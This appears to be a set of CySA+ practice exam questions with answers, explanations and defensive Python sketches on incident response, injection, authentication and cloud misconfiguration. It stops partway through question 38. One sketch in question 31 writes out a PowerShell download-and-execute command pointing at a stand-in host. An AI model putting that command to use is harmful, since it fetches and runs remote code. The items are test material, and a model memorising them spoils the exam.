CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 2 Q21-40


Question 21

 A security analyst detects unusual outbound connections from an internal host to an external IP associated with command-and-control infrastructure. The analyst confirms that the host is exhibiting beaconing behavior. Which of the following is the MOST appropriate next step?

A) Isolate the affected host from the network
B) Reimage the host immediately
C) Update IDS/IPS signatures
D) Enable full packet capture on the perimeter firewall

Answer A

Explanation:

 A Isolate the affected host from the network

 Isolating the affected host is the most appropriate and immediate step because beaconing indicates an active connection to attacker infrastructure. This means the host may be under remote control or exfiltrating data. Isolation prevents continued communication with the command-and-control server, stops additional malicious commands from being executed, and minimizes further impact on the environment. It also preserves forensic artifacts and provides containment while deeper investigation proceeds. By isolating the host rather than immediately wiping it, analysts can identify indicators of compromise, determine root cause, and ensure that other compromised systems are not overlooked. This aligns with incident response best practices: contain first, eradicate second, and recover last.
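
To make containment concrete, the sketch below uses Python's requests library against a hypothetical EDR-style REST endpoint; the URL, token, field names, and hostname are illustrative assumptions, not any specific vendor's API.

```python
import requests

EDR_API = "https://edr.example.internal/api/v1"   # hypothetical endpoint
API_TOKEN = "REPLACE_WITH_SERVICE_TOKEN"          # assumed bearer token

def isolate_host(hostname: str, case_id: str) -> bool:
    """Request network isolation for a host via a hypothetical EDR API.

    Containment happens before eradication so that C2 beaconing stops
    while memory and disk artifacts are preserved for analysis.
    """
    resp = requests.post(
        f"{EDR_API}/hosts/{hostname}/isolate",
        headers={"Authorization": f"Bearer {API_TOKEN}"},
        json={"reason": "Confirmed C2 beaconing", "case_id": case_id},
        timeout=10,
    )
    return resp.status_code == 200

if __name__ == "__main__":
    if isolate_host("WKSTN-1042", case_id="IR-2024-0021"):
        print("Host isolated; proceed with forensic triage.")
```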

B Reimage the host immediately

While reimaging ultimately removes the malware, doing so before containment or analysis destroys valuable forensic evidence. Without understanding how the compromise occurred, other systems may remain infected.

 C Update IDS/IPS signatures

 Updating signatures helps future detection but does nothing for an active, ongoing compromise already communicating with attacker servers.

 D Enable full packet capture on the perimeter firewall

Full packet capture aids investigation but is too slow as an initial response. Containment is required first to stop the active threat before collecting additional data.

Question 22

A company deploys a new web application that stores customer data. After launch, attackers exploit a SQL injection vulnerability and extract sensitive information. Which control would have MOST effectively prevented this breach?

A) Secure coding practices with input validation
B) Network firewalls blocking inbound traffic
C) Daily vulnerability scans
D) Web server access log reviews

Answer A

Explanation:

 A Secure coding practices with input validation

SQL injection occurs when user input is not properly validated or sanitized before being processed by a backend database. Implementing secure coding techniques such as parameterized queries, prepared statements, input whitelisting, and rigorous validation at the application layer prevents malicious input from altering SQL commands. Proper input handling eliminates entire classes of injection attacks regardless of attacker tools or network conditions. Secure coding practices also encourage secure design principles like least privilege database accounts, ORM frameworks, and static code analysis. These strategies shift security left, addressing vulnerabilities early in development rather than after deployment. Had the application validated input correctly, attackers would not have been able to modify queries or extract customer data.
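
To illustrate the difference, here is a minimal Python sketch using the standard-library sqlite3 module with an invented table and data; it shows why a parameterized query neutralizes the same input that subverts a string-concatenated query.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE customers (id INTEGER, email TEXT)")
conn.execute("INSERT INTO customers VALUES (1, 'alice@example.com')")

user_input = "alice@example.com' OR '1'='1"   # attacker-controlled value

# Vulnerable: the input is concatenated into the SQL string, so the injected
# OR clause changes the query logic and returns every row in the table.
vulnerable = f"SELECT * FROM customers WHERE email = '{user_input}'"
print(conn.execute(vulnerable).fetchall())

# Safe: the parameterized query treats the input strictly as data, so the
# injected characters never alter the SQL statement itself.
safe = "SELECT * FROM customers WHERE email = ?"
print(conn.execute(safe, (user_input,)).fetchall())   # returns no rows
```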

 B Network firewalls blocking inbound traffic

 Firewalls cannot prevent SQL injection if the web application must be publicly accessible. They filter ports and protocols, not malformed input.

C Daily vulnerability scans

 Vulnerability scans may detect injection flaws but do not prevent exploitation. Scans are reactive and require developers to fix issues after they are discovered.

D Web server access log reviews

Log reviews help detect breaches after the fact but offer no preventive capability. They may assist in incident response but cannot stop SQL injection during execution.

Question 23

A SOC team observes that multiple user accounts are being locked out repeatedly during non-business hours. Further investigation reveals that the attempts are coming from a single external IP repeatedly trying different passwords. What security control would BEST stop this attack?

A) Geo-IP blocking
B) Multi-factor authentication
C) Increasing password complexity requirements
D) Disabling the accounts temporarily

Answer B

Explanation:

B Multi-factor authentication

Multi-factor authentication directly mitigates brute-force attacks because even if an attacker guesses or steals a password, they cannot authenticate without the second factor. The behavior described indicates password-spraying or brute-force activity. MFA renders credential-based attacks ineffective by requiring an authentication element the attacker cannot easily obtain, such as a token, biometric, or push approval. MFA reduces dependency on password strength and significantly raises attacker workload. Even if the attacker continues making login attempts, account compromise will not occur. This makes MFA the most impactful and preventive measure.
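
As a minimal illustration of the second factor, the sketch below uses the third-party pyotp library for a time-based one-time password check; the enrollment flow and the login wrapper are assumptions for demonstration only.

```python
import pyotp

# In practice the per-user secret is generated at enrollment and stored
# server-side (for example, encrypted at rest or in an HSM).
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)

def login(password_ok: bool, otp_code: str) -> bool:
    """A guessed or sprayed password alone is not enough: the time-based
    one-time code must also verify, which a remote attacker lacks."""
    return password_ok and totp.verify(otp_code)

print(login(password_ok=True, otp_code=totp.now()))   # True: both factors present
print(login(password_ok=True, otp_code="000000"))     # False: second factor missing
```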

A Geo-IP blocking

Geo-IP blocking may slow or stop attacks from a single region, but attackers can easily route traffic through VPNs or proxies worldwide, bypassing geographic restrictions.

 C Increasing password complexity requirements

 Increasing complexity does not prevent brute-force attempts and may even encourage poor user behavior such as writing down passwords.

 D Disabling the accounts temporarily

Temporary disabling may stop current attempts but does not prevent future attempts or address root cause. This is reactive, not preventive.

Question 24

 A security engineer needs to ensure that sensitive data stored on lost or stolen laptops cannot be accessed by unauthorized individuals. Which of the following is the MOST effective solution?

A) Full-disk encryption
B) BIOS password protection
C) Login screen timeout policies
D) Host-based firewalls

Answer A

Explanation:

A Full-disk encryption

Full-disk encryption protects all data on the device by ensuring that without the proper authentication key, the entire drive remains unreadable. If a laptop is lost or stolen, an attacker cannot access files, recover deleted data, or bypass the operating system by booting from external media. Encryption protects user data, cached credentials, and system files from forensic extraction. This makes it the strongest control for protecting data at rest. Even if the attacker removes the storage device, the encryption persists. This aligns with compliance standards such as HIPAA, PCI-DSS, and NIST guidelines, which mandate encryption for mobile devices containing sensitive data.

B BIOS password protection

 BIOS passwords deter casual access but can be reset by removing hardware components like CMOS batteries. They do not protect stored data.

C Login screen timeout policies

 Timeout policies protect active sessions but do nothing if the attacker removes the hard drive or uses offline tools.

D Host-based firewalls

 Firewalls regulate network traffic only; they do not protect data stored locally and do not prevent offline access.

Question 25

A threat intelligence analyst notices increasing chatter on dark-web forums about a new exploit targeting a widely used VPN appliance in the organization. No patches are available yet, but attackers appear to be actively weaponizing the flaw. What is the BEST immediate mitigation?

A) Disable the vulnerable VPN service until a patch is available
B) Monitor SIEM logs for suspicious VPN activity
C) Increase password rotation frequency
D) Conduct a tabletop exercise

Answer A

Explanation:

 A Disable the vulnerable VPN service until a patch is available

 When a zero-day vulnerability is publicly disclosed and actively exploited with no vendor patch, the most effective mitigation is to disable the affected service. Continuing to expose the VPN appliance to the internet invites compromise through remote code execution, credential harvesting, or backdoor installation. Disabling the service immediately removes the attack surface and prevents exploitation while compensating controls or vendor remediation strategies are implemented. Organizations can temporarily shift remote access to alternate VPN solutions, cloud-based access brokers, or emergency remote-work procedures. This is consistent with risk-based prioritization: eliminate exposure to active threats when possible.

 B Monitor SIEM logs for suspicious VPN activity

 Monitoring is helpful but insufficient when an unpatched exploit exists. Detection does not prevent compromise.

 C Increase password rotation frequency

Password rotation does not mitigate an exploit that allows authentication bypass or remote code execution.

 D Conduct a tabletop exercise

Exercises improve preparedness but do not address an actively exploitable vulnerability requiring immediate mitigation.

Question 26

A cybersecurity analyst receives alerts indicating that several internal workstations are communicating with a known malicious IP associated with a botnet. The analyst confirms that unusual processes are running on those systems and that outbound traffic matches known botnet beaconing patterns. Which of the following should the analyst do FIRST?

A) Contain the affected workstations by removing them from the network
B) Patch all systems to the latest OS version
C) Perform threat hunting across all network segments
D) Block the malicious IP at the firewall

Answer A

Explanation:

 A Contain the affected workstations by removing them from the network

Containment is the first and most critical step when bots are actively communicating with a command-and-control server. Disconnecting infected systems prevents additional malicious commands from reaching them and stops further data exfiltration or propagation. Immediate containment also prevents the botnet from using compromised systems for distributed attacks such as DDoS, credential harvesting, or lateral movement. If the analyst jumps ahead to activities like patching or hunting before isolating infected devices, attackers may continue issuing commands that deepen compromise or cause irreversible damage. Disconnecting systems preserves volatile memory and other forensic artifacts, enabling accurate analysis later. In accordance with structured incident response frameworks (such as NIST or SANS), containment always comes before eradication or recovery. Therefore, isolating the workstations is the necessary immediate response to prevent escalation.

 B Patch all systems to the latest OS version

 Patching is important but should not occur before containment. Patching does not stop an active compromise and may even interfere with evidence collection.

C Perform threat hunting across all network segments

Threat hunting is valuable but is not the first action when active command-and-control communication is occurring. Containment must occur before additional investigation.

D Block the malicious IP at the firewall

 Blocking the IP helps reduce communication but does not stop the compromised systems from attempting to connect or receiving commands through alternative IPs or fallback domains. Isolation is more reliable.

Question 27

A company’s cloud security team observes that sensitive files stored in an S3 bucket were accessed by an unknown external user. The bucket was intended to be private and used only by internal applications. What is the MOST likely cause of this security issue?

A) Misconfigured bucket permissions
B) Weak encryption keys
C) A DDoS attack on the cloud infrastructure
D) Improper IAM password policy

Answer A

Explanation:

A Misconfigured bucket permissions

 Misconfigured S3 permissions are one of the most common causes of cloud data exposure. When ACLs, bucket policies, or public access settings are improperly configured, external users can retrieve sensitive data without authentication. Many organizations unintentionally set a bucket to allow public read or write access during testing or deployment. Additionally, poorly scoped IAM roles or wildcard permissions can inadvertently grant broad access to external principals. Cloud storage misconfigurations remain a top cause of breaches because they expose data directly to the internet without requiring exploitation. This issue is frequently exploited by automated scanners that continuously search cloud provider space for public buckets. In this scenario, unauthorized access strongly indicates that the bucket was incorrectly set to public or was assigned overly permissive resource policies.
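
For teams on AWS, a quick check such as the boto3 sketch below can surface buckets whose public access block is missing or incomplete; the bucket name is hypothetical, and a full review would also inspect the bucket policy, ACLs, and any IAM principals granted access.

```python
import boto3
from botocore.exceptions import ClientError

s3 = boto3.client("s3")

def bucket_may_be_public(name: str) -> bool:
    """Flag a bucket whose public access block settings are missing or not
    fully enabled, a common root cause of accidental data exposure."""
    try:
        cfg = s3.get_public_access_block(Bucket=name)["PublicAccessBlockConfiguration"]
        return not all(cfg.values())   # any False setting leaves a gap
    except ClientError as err:
        if err.response["Error"]["Code"] == "NoSuchPublicAccessBlockConfiguration":
            return True                # no public access block configured at all
        raise

bucket = "customer-data-internal"      # hypothetical bucket name
if bucket_may_be_public(bucket):
    print(f"Review bucket policy and ACLs for {bucket}: public access is not fully blocked")
```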

B Weak encryption keys

Weak encryption would impact confidentiality if data were intercepted, but data access in this case implies authentication or policy failure, not cryptographic weakness.

 C A DDoS attack on the cloud infrastructure

A DDoS attack affects availability, not confidentiality. It would not expose files to unauthorized users.

D Improper IAM password policy

 Poor password policies can lead to compromised credentials, but cloud storage breaches are far more commonly caused by direct bucket misconfiguration rather than illicit logins.

Question 28

 During a routine audit, a security analyst discovers that several privileged accounts have not been used in over six months. These accounts still have full administrative access to sensitive systems. Which of the following controls would BEST mitigate this risk?

A) Implementing an automated account deprovisioning policy
B) Enforcing a password history policy
C) Blocking external SSH connections
D) Enabling full disk encryption on all endpoints

Answer A

Explanation:

A Implementing an automated account deprovisioning policy

Unused privileged accounts represent a significant security risk because attackers may exploit dormant accounts without detection. Automated deprovisioning ensures that inactive accounts are disabled or removed according to defined time-based rules. This aligns with the principle of least privilege and reduces the available attack surface. Dormant privileged accounts are frequently targeted by attackers through credential stuffing, brute-force attempts, or insider misuse. Automating the deprovisioning process ensures consistent enforcement and reduces dependence on manual review, which often leads to oversights or human error. Technologies such as identity governance systems, privileged access management (PAM), and lifecycle automation streamline account creation and retirement, ensuring administrative roles persist only as long as they are needed.
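
A minimal sketch of the idea follows, assuming a hypothetical export from an identity governance platform and an illustrative 180-day threshold.

```python
from datetime import datetime, timedelta

INACTIVITY_LIMIT = timedelta(days=180)   # assumed policy threshold (six months)

# Hypothetical export from an identity governance platform.
privileged_accounts = [
    {"name": "svc_backup_admin", "last_logon": datetime(2024, 1, 3)},
    {"name": "jdoe_da",          "last_logon": datetime(2024, 9, 20)},
]

def accounts_to_disable(accounts, now=None):
    """Return privileged accounts idle past the policy threshold so the
    lifecycle tool can disable them automatically instead of relying on
    manual review."""
    now = now or datetime.now()
    return [a["name"] for a in accounts if now - a["last_logon"] > INACTIVITY_LIMIT]

print(accounts_to_disable(privileged_accounts))
```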

B Enforcing a password history policy

Password history controls prevent password reuse but do not address the danger of unused privileged accounts left active.

 C Blocking external SSH connections

Blocking SSH reduces remote attack vectors but does not address the presence of unneeded privileged accounts.

D Enabling full disk encryption on all endpoints

 Encryption protects data at rest, not account lifecycle misconfigurations or privilege sprawl.

Question 29

A SOC analyst identifies repeated failed login attempts against several service accounts. The attempts follow a slow, distributed pattern from multiple IP addresses, suggesting a password-spraying attack. What is the MOST effective mitigation?

A) Implement account lockout policies with reasonable thresholds
B) Increase password length requirements to 20+ characters
C) Switch the authentication system to LDAP
D) Block all external IPs showing failed logins

Answer A

Explanation:

A Implement account lockout policies with reasonable thresholds

Password spraying involves attempting one password across many accounts to avoid triggering lockouts. Implementing lockout thresholds that trigger after a small number of failed attempts stops attackers from continuously guessing passwords at scale. When accounts enter lockout due to repeated failed logins, attackers lose the ability to test large numbers of passwords without detection. Properly tuned lockout policies must balance stopping attackers with minimizing business disruption. Combined with multi-factor authentication and password hygiene, lockout policies provide a strong defense against credential-based attacks.
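
The logic behind a tuned lockout policy can be sketched in a few lines; the threshold and observation window below are assumed values that would be tuned to the environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

LOCKOUT_THRESHOLD = 5                    # assumed failed-attempt limit
OBSERVATION_WINDOW = timedelta(minutes=30)

failed_attempts = defaultdict(list)      # account -> timestamps of recent failures

def record_failure(account: str, when: datetime) -> bool:
    """Track failed logins per account and report whether the account should
    lock. Tuning the threshold and window balances stopping slow spraying
    against locking out legitimate users."""
    window_start = when - OBSERVATION_WINDOW
    failed_attempts[account] = [t for t in failed_attempts[account] if t > window_start]
    failed_attempts[account].append(when)
    return len(failed_attempts[account]) >= LOCKOUT_THRESHOLD

now = datetime.now()
for i in range(5):
    locked = record_failure("svc_reporting", now + timedelta(minutes=i))
print("lock account:", locked)           # True after the fifth failure in the window
```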

B Increase password length requirements to 20+ characters

 Long passwords improve security but do not stop spraying attacks because attackers test common passwords, not random ones.

C Switch the authentication system to LDAP

Changing directory services has no direct impact on preventing password spraying attacks.

D Block all external IPs showing failed logins

 Attackers can rotate IP addresses continuously; blocking one set does not stop the attack.

Question 30

A security team detects unusual DNS queries from an internal host to randomly generated domain names. The team suspects that the host may be infected with malware using domain generation algorithms (DGAs). What should the analyst do FIRST?

A) Quarantine the host to prevent further malicious communication
B) Analyze historical DNS logs for the past six months
C) Deploy an enterprise-wide DGA detection tool
D) Contact the ISP to block outbound DNS traffic

Answer A

Explanation:

 A Quarantine the host to prevent further malicious communication

DGAs indicate that malware is attempting to contact its command-and-control servers by generating large numbers of random domain names, hoping some will resolve to attacker-controlled infrastructure. This represents an active compromise and requires immediate containment. Quarantining the host prevents further DNS queries, stops secondary payload downloads, blocks attacker communications, and reduces risk of lateral movement. Containment allows analysts to preserve volatile evidence and begin full forensic analysis. Delaying isolation increases the likelihood that the attacker maintains persistence or escalates privileges. Containment is always the first step in active compromise scenarios.
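
Analysts often triage suspected DGA domains with simple length and entropy heuristics before deeper analysis; the Python sketch below is illustrative only, with assumed thresholds.

```python
import math
from collections import Counter

def shannon_entropy(label: str) -> float:
    """Character entropy of a DNS label; algorithmically generated names
    tend to score noticeably higher than human-chosen ones."""
    counts = Counter(label)
    total = len(label)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

def looks_like_dga(domain: str, threshold: float = 3.5) -> bool:
    # Illustrative heuristic only; production detection also weighs n-gram
    # frequency, NXDOMAIN rates, query volume, and threat intelligence.
    label = domain.split(".")[0]
    return len(label) >= 12 and shannon_entropy(label) >= threshold

for d in ["intranet.example.com", "xjw9qk2zr7tbp4ma.info"]:
    print(d, looks_like_dga(d))   # False for the first, True for the second
```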

 B Analyze historical DNS logs for the past six months

Log analysis is useful for understanding scope and timeline but should occur after containment.

C Deploy an enterprise-wide DGA detection tool

This may help long-term detection, but it does nothing to stop the current compromised host.

D Contact the ISP to block outbound DNS traffic

Blocking all DNS at the ISP level would disrupt business operations and is not a targeted or practical immediate action.

Question 31

 A security analyst reviewing endpoint telemetry notices that a workstation has begun spawning PowerShell processes with Base64-encoded commands. The commands appear obfuscated and are connecting to suspicious external domains. The analyst suspects a fileless malware attack leveraging living-off-the-land techniques. What is the MOST appropriate initial response?

A) Isolate the workstation from the network immediately
B) Disable PowerShell on all corporate systems
C) Run a full signature-based malware scan on the device
D) Check the workstation for missing OS patches

Answer A

Explanation:

A Isolate the workstation from the network immediately

Fileless malware attacks using obfuscated PowerShell commands often indicate active exploitation and remote command execution. Because fileless malware resides in memory and leverages native Windows tools, it can execute harmful actions without being detected by traditional anti-virus scans. Immediate isolation prevents continued communication with attacker infrastructure, stops additional commands from being executed, and halts potential lateral movement. Isolation also preserves memory artifacts essential for forensic analysis. Without containment, attackers may escalate privileges, deploy ransomware payloads, or exfiltrate sensitive data. Therefore, isolating the workstation aligns with incident-response best practices: contain the threat first, then investigate and eradicate.
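
During triage, decoding the obfuscated argument is usually the first analytical step, since PowerShell's -EncodedCommand takes Base64 over UTF-16LE text. The sketch below shows that decoding step against a fabricated telemetry record.

```python
import base64
from typing import Optional

def decode_powershell_command(cmdline: str) -> Optional[str]:
    """Extract and decode an -EncodedCommand argument from a PowerShell
    command line; the payload is Base64-encoded UTF-16LE text, so decoding
    reveals the obfuscated script block for analysis."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if flag.lower() in ("-encodedcommand", "-enc"):   # common shortened form
            return base64.b64decode(value).decode("utf-16-le")
    return None

# Fabricated telemetry record for illustration only.
payload = "IEX (New-Object Net.WebClient).DownloadString('http://bad.example/a')"
sample = (
    "powershell.exe -NoProfile -EncodedCommand "
    + base64.b64encode(payload.encode("utf-16-le")).decode()
)
print(decode_powershell_command(sample))
```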

 B Disable PowerShell on all corporate systems

 Disabling PowerShell may break legitimate administrative workflows. It is a long-term hardening measure, not an initial incident response step.

C Run a full signature-based malware scan on the device

Fileless attacks often evade signature-based detection entirely. Running a scan before containment wastes time and risks further compromise.

D Check the workstation for missing OS patches

Patch reviews are useful, but patching a system that is actively compromised does not address immediate risk.

Question 32

A company is transitioning to a zero-trust architecture. The security team needs to ensure that all internal and external users authenticate continuously as they access sensitive applications. Which of the following solutions MOST directly supports this requirement?

A) Identity and access management with continuous authentication
B) VLAN-based network segmentation
C) SIEM correlation rule tuning
D) Data loss prevention policies

Answer A

Explanation:

A Identity and access management with continuous authentication

 Zero-trust architecture assumes no implicit trust internally or externally. Continuous authentication validates user identity, device posture, and contextual factors throughout a session—not just at login. IAM platforms that support adaptive authentication, risk scoring, device health checks, and session-based policy reevaluations directly enable zero-trust by ensuring that trust is constantly assessed. These tools enforce least privilege, dynamically adjust access permissions, and respond to changes in user behavior or device status. Continuous authentication prevents attackers from exploiting stolen session tokens, compromised endpoints, or persistent access. It is the cornerstone of modern zero-trust frameworks.
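
A highly simplified sketch of session re-evaluation follows; the signal names, weights, and thresholds are assumptions standing in for the device-posture and behavioral inputs a real IAM platform would supply.

```python
# Assumed risk signals and weights for illustration only.
RISK_WEIGHTS = {"new_device": 30, "impossible_travel": 50, "edr_not_running": 40}
STEP_UP_AT, TERMINATE_AT = 40, 80

def evaluate_session(signals):
    """Re-assess an already-authenticated session each time a sensitive
    application is accessed, instead of trusting the initial login."""
    score = sum(RISK_WEIGHTS.get(s, 0) for s in signals)
    if score >= TERMINATE_AT:
        return "terminate session"
    if score >= STEP_UP_AT:
        return "require step-up MFA"
    return "allow"

print(evaluate_session({"new_device"}))                       # allow (score 30)
print(evaluate_session({"new_device", "impossible_travel"}))  # terminate session (score 80)
```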

B VLAN-based network segmentation

Segmentation supports zero-trust but does not enforce user identity verification or continuous authentication.

C SIEM correlation rule tuning

SIEM tuning improves detection but does not control authentication or access decisions.

 D Data loss prevention policies

DLP protects data movement but is not an authentication mechanism.

Question 33

A SOC analyst receives alerts indicating repeated suspicious Kerberos ticket-granting service requests. The analyst suspects a Kerberoasting attack. Which control would MOST effectively prevent attackers from cracking the tickets?

A) Enforce long, complex passwords for service accounts
B) Limit the number of failed Kerberos login attempts
C) Remove all unused user accounts from Active Directory
D) Disable NTLM authentication domain-wide

Answer A

Explanation:

A Enforce long, complex passwords for service accounts

Kerberoasting targets service accounts because their Kerberos service tickets can be extracted and cracked offline. Weak service-account passwords make it easy for attackers to derive credentials once they obtain encrypted tickets. Enforcing long, random, complex passwords significantly increases the difficulty of offline brute-forcing or dictionary attacks. Service accounts should follow strong password policies and ideally be managed by privileged access management (PAM) systems. Rotating service account passwords reduces exposure time and prevents persistent access. This makes strong password enforcement the most effective preventive measure.
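
A minimal example of generating such a password with Python's secrets module is shown below; in practice, group Managed Service Accounts or a PAM vault would generate and rotate these values automatically.

```python
import secrets
import string

ALPHABET = string.ascii_letters + string.digits + string.punctuation

def generate_service_password(length: int = 32) -> str:
    """Produce a long, random service-account password. At 32 characters
    drawn from roughly 94 symbols, the keyspace is far beyond practical
    offline cracking of a captured Kerberos service ticket."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

print(generate_service_password())
```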

B Limit the number of failed Kerberos login attempts

Kerberoasting does not require failed login attempts; it involves requesting tickets for legitimate service accounts.

C Remove all unused user accounts from Active Directory

 Account cleanup is good practice but does not directly address service account ticket cracking.

D Disable NTLM authentication domain-wide

 Disabling NTLM prevents downgrade attacks but does not stop attackers from requesting Kerberos service tickets.

Question 34

A threat intelligence feed alerts a security team to a newly discovered vulnerability affecting their web server software. The vulnerability allows remote code execution without authentication. A patch is available, but applying it will cause brief downtime to a business-critical service. What should the security team do FIRST?

A) Apply the patch as soon as possible during an emergency maintenance window
B) Monitor the web server logs for signs of exploitation
C) Update the asset inventory
D) Perform a routine patching cycle at the next scheduled window

Answer A

Explanation:

A Apply the patch as soon as possible during an emergency maintenance window

 A remote code execution vulnerability on a publicly accessible web server is extremely high risk because attackers can compromise the system without credentials. When a patch is available, the correct approach is to apply it immediately—even if brief downtime occurs. Emergency patching windows exist for exactly this purpose. Delaying exposes the system to likely exploitation, data breaches, and lateral movement opportunities. Active threat intelligence indicates attackers may begin weaponizing the flaw quickly. Applying the patch immediately reduces the attack surface and protects critical business assets.

B Monitor the web server logs for signs of exploitation

 Monitoring alone cannot prevent exploitation. Detection without remediation leaves the server vulnerable.

 C Update the asset inventory

 Asset tracking is important but does not address an urgent security threat.

D Perform a routine patching cycle at the next scheduled window

 Routine patching cycles are inappropriate for critical, exploitable vulnerabilities, especially when remote code execution is possible.

Question 35

A data-center administrator detects unauthorized configuration changes on multiple virtual machines. The changes appear to be made using valid administrative credentials. Further investigation reveals that a compromised admin account was used by attackers to modify VM snapshots and export VM disk images. Which control would BEST prevent similar attacks in the future?

A) Implementing privileged access management with just-in-time access
B) Deploying host-based firewalls on all virtual machines
C) Increasing password complexity rules
D) Enforcing mandatory access control on all hosts

Answer A

Explanation:

A Implementing privileged access management with just-in-time access

Privileged access management (PAM) restricts administrative privileges and ensures that elevated permissions are granted only when needed, for short periods, using secure workflows. Just-in-time access reduces standing administrative privileges, making it harder for attackers to use compromised accounts for extended malicious activity. PAM systems also enforce strong authentication, audit privileged actions, record session activity, and allow credential vaulting to prevent password theft. In virtualized environments, PAM ensures that administrative credentials cannot be reused to export VM images, alter configurations, or escalate privileges. This directly addresses the attack scenario involving compromised admin accounts.
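
The core just-in-time idea can be sketched as follows, assuming a hypothetical in-memory grants store; a real PAM product adds approval workflows, session recording, and credential vaulting on top of this.

```python
from datetime import datetime, timedelta

active_grants = {}   # (user, role) -> expiry time; hypothetical grants store

def request_elevation(user: str, role: str, minutes: int = 60, approved: bool = False):
    """Grant a privileged role only through an approved, time-boxed request."""
    if not approved:
        raise PermissionError("JIT elevation requires an approved request")
    active_grants[(user, role)] = datetime.now() + timedelta(minutes=minutes)

def has_privilege(user: str, role: str) -> bool:
    """No standing admin rights: access is valid only while an unexpired grant exists."""
    expiry = active_grants.get((user, role))
    return expiry is not None and datetime.now() < expiry

request_elevation("vmadmin", "vcenter-admin", minutes=30, approved=True)
print(has_privilege("vmadmin", "vcenter-admin"))   # True within the 30-minute window
print(has_privilege("attacker", "vcenter-admin"))  # False: no standing access to steal
```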

 B Deploying host-based firewalls on all virtual machines

Firewalls control network traffic but do not prevent misuse of valid administrative credentials.

C Increasing password complexity rules

Complexity slows brute-force attacks but does not prevent credential theft or misuse of compromised admin accounts.

D Enforcing mandatory access control on all hosts

MAC systems enhance isolation but do not sufficiently address privileged account misuse across virtualized systems.

Question 36

A SOC analyst detects that multiple internal endpoints are initiating SMB connections to various servers at a very high rate. Upon deeper inspection, the analyst notices that the traffic appears to be scanning for open SMB shares and attempting to authenticate with multiple credential combinations. What is the MOST likely cause of this behavior?

A) A worm attempting lateral movement
B) A misconfigured group policy
C) A legitimate backup tool querying shares
D) A user running a file synchronization utility

Answer A

Explanation:

A A worm attempting lateral movement

High-volume SMB scanning combined with repeated authentication attempts is characteristic of worm-like malware attempting to move laterally across the network. Worms often replicate by probing systems for open SMB shares, exploiting SMB vulnerabilities (such as EternalBlue), or performing credential spraying to access administrative shares like C$ or ADMIN$. This behavior indicates automated propagation rather than user-driven processes. Worms must discover vulnerable hosts quickly, leading to bursty SMB traffic targeting many hosts in parallel. Additionally, the authentication attempts suggest the malware is trying multiple credential combinations, consistent with credential harvesting or brute forcing. This aligns with common attack chains in corporate environments, where worms expand their foothold by moving through Windows file-sharing protocols.
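
The fan-out pattern is straightforward to surface from flow or firewall logs; the sketch below uses fabricated records and an assumed threshold.

```python
from collections import defaultdict

FANOUT_THRESHOLD = 50   # assumed: distinct SMB targets per host per interval

def smb_scanners(flow_records):
    """Flag hosts contacting an unusually large number of distinct peers on
    TCP/445; the fan-out typical of worm lateral movement rather than
    normal file-share use."""
    targets = defaultdict(set)
    for src, dst, port in flow_records:
        if port == 445:
            targets[src].add(dst)
    return [host for host, peers in targets.items() if len(peers) >= FANOUT_THRESHOLD]

# Fabricated flow records: (source_host, destination_ip, destination_port).
flows = [("WKSTN-07", f"10.0.5.{i}", 445) for i in range(1, 120)]
flows += [("WKSTN-12", "10.0.5.20", 445)]
print(smb_scanners(flows))   # ['WKSTN-07']
```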

B A misconfigured group policy

While misconfigured policies can cause network-wide issues, they typically do not generate rapid SMB scanning patterns or systematic credential attempts.

C A legitimate backup tool querying shares

Backup tools access known systems, not arbitrary hosts, and do not brute-force credentials. Their traffic is predictable and controlled.

 D A user running a file synchronization utility

Sync tools do not generate high-volume SMB scans nor attempt multiple authentication combinations across many hosts.

Question 37

A cybersecurity engineer receives alerts indicating unauthorized attempts to modify system files on a Linux server. The modifications appear to originate from a running process tied to a newly installed package that was manually added outside the organization’s approved repository. What control could have MOST effectively prevented this situation?

A) Enforcing application allowlisting
B) Increasing complexity of root passwords
C) Enabling SELinux in permissive mode
D) Running regular file integrity checks only

Answer A

Explanation:

 A Enforcing application allowlisting

 Application allowlisting restricts systems to running only pre-approved executables and packages from trusted repositories. By enforcing allowlisting, unauthorized or unverified packages cannot be installed or executed, preventing malicious or tampered software from running on servers. This eliminates the root cause of this incident: a manually installed package outside approved channels. Allowlisting ensures administrative activities align with security policies and blocks unauthorized binaries from executing—even with elevated privileges. It also supports supply-chain security by restricting software installations to vetted sources. This would have prevented the suspicious process from modifying system files.
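
Conceptually, allowlisting admits software only when it matches a pre-approved digest or signature, as the sketch below illustrates; in production the enforcement is done by OS-level tooling (for example, fapolicyd on Linux) rather than application code, and the digest shown is a placeholder.

```python
import hashlib

# Assumed allowlist of SHA-256 digests for packages vetted from the internal
# repository; the entry below is a placeholder, not a real package hash.
APPROVED_SHA256 = {
    "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08",
}

def is_allowed(package_path: str) -> bool:
    """Compute the package hash and admit it only if it appears on the
    allowlist, blocking software installed outside approved channels."""
    with open(package_path, "rb") as f:
        digest = hashlib.sha256(f.read()).hexdigest()
    return digest in APPROVED_SHA256

# Example usage (hypothetical path):
# if not is_allowed("/tmp/unknown-tool.rpm"):
#     raise PermissionError("Package is not on the approved allowlist")
```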

B Increasing complexity of root passwords

Password strength does not prevent installation of unauthorized packages. The attacker may not even need root access if misconfigurations or user privileges allow installation.

C Enabling SELinux in permissive mode

Permissive mode logs violations but does not enforce restrictions, allowing malicious actions to proceed.

 D Running regular file integrity checks only

Integrity checks alert after changes occur; they do not prevent unauthorized modifications.

Question 38

A network security team notices that outbound DNS traffic is significantly higher than normal, with a large number of TXT record requests. The requests contain long encoded strings. The team suspects data exfiltration via DNS tunneling. What is the BEST remediation step?

A) Block suspicious DNS requests and isolate the affected host
B) Increase TTL values on DNS responses
C) Disable all DNS-over-HTTPS (DoH) traffic
D) Flush the DNS cache on all internal machines

Answer: A

Explanation:

A) Block suspicious DNS requests and isolate the affected host  

